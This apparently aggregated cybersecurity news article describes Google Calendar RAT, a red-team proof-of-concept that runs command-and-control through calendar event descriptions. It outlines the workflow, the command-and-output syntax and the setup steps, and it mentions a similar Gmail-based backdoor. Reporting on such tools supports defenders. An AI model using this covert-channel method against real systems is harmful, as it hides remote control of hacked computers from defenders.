Cato CTRL (Cyber Threats Research Lab) has released its Q2 2024 Cato CTRL SASE Threat Report. The report highlights critical findings based on the analysis of a staggering 1.38 trillion network flows from more than 2,500 of Cato’s global customers, between April and June 2024.
Key Insights from the Q2 2024 Cato CTRL SASE Threat Report
The report is packed with unique insights that are based on Read More
Google Calendar RAT Abusing Calendar Events to Create Red Teaming Infrastructure
Google Calendar RAT (GCR) is a proof of concept for Command & Control (C2) via Google Calendar Events. It’s useful when setting up a full red team infrastructure is challenging.
GCR needs a Gmail account, using event descriptions in Google Calendar as a “Covert Channel” for direct connections to Google. Besides this, it acts as a layer 7 application called Covert Channel, as reported by its developer and researcher, Mr. Saighnal (aka Valerio Alessandroni).
When GCR is running on a computer that has been hacked, it checks the calendar event description for new commands every so often. It then runs those commands on the target device and adds the results of the commands to the event description. Based on what the coder said, GCR only talks through official Google infrastructure, which makes it hard for defenders to spot strange behavior, Google said.
GCR Workflow
The red teaming tool uses Google Calendar events for C2. The tool enables an attacker to place commands in the event description field of Google Calendar events.
GCR connects to a shared Google Calendar link, checks for pending commands, and creates a new one “whoami” if none exist.
In the below image, the complete GCR workflow attack is presented:
GCR Workflow Attack (Source – GitHub)
While apart from this, each event consists of two parts, and here we have mentioned them:-
The Title contains a unique ID allowing multiple commands for scheduling under the same ID.
The run command and its base64-encoded output are contained in the description and are separated by “|”.
Moreover, the connections appear to be completely genuine because they are limited to Google’s servers in terms of networking.
Ensure your Cyber Resiliance with the recent wave of cyber-attacks targeting the financial services sector. Almost 60% respondents not confident to recover fully from a cyber attack.
How do I use it?
Here below, we have mentioned all the steps to use it:-
First of all, create a Google service account, get the credentials.json file, and put it in the script’s directory.
Create a new Google calendar, share it with the service account, and update the script with your calendar address.
It automatically creates an event with a distinct target ID and runs the “whoami” command when it is run on the target system.
Now, in the communication’s event description, make sure to use the following syntax:-
=> CLEAR_COMMAND|BASE64_OUTPUT
Earlier, Google TAG noticed an Iran-linked APT group using Gmail for C2 with a small .NET backdoor, BANANAMAIL, in March 2023. Besides this, through IMAP the backdoor checks email accounts for the execution of commands.
We haven’t seen GCR used in real life yet, but Mandiant has seen multiple players share the public proof of concept on underground sites. Google said via a threat report that people are still interested in abusing cloud services.
Discover all the ways MITRE ATT&CK can help you defend your organization. Build your security strategy and policies by making the most of this important framework.
What is the MITRE ATT&CK Framework?
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely adopted framework and knowledge base that outlines and categorizes the tactics, techniques, and procedures (TTPs) Read More
The Hacker News | #1 Trusted Cybersecurity News Site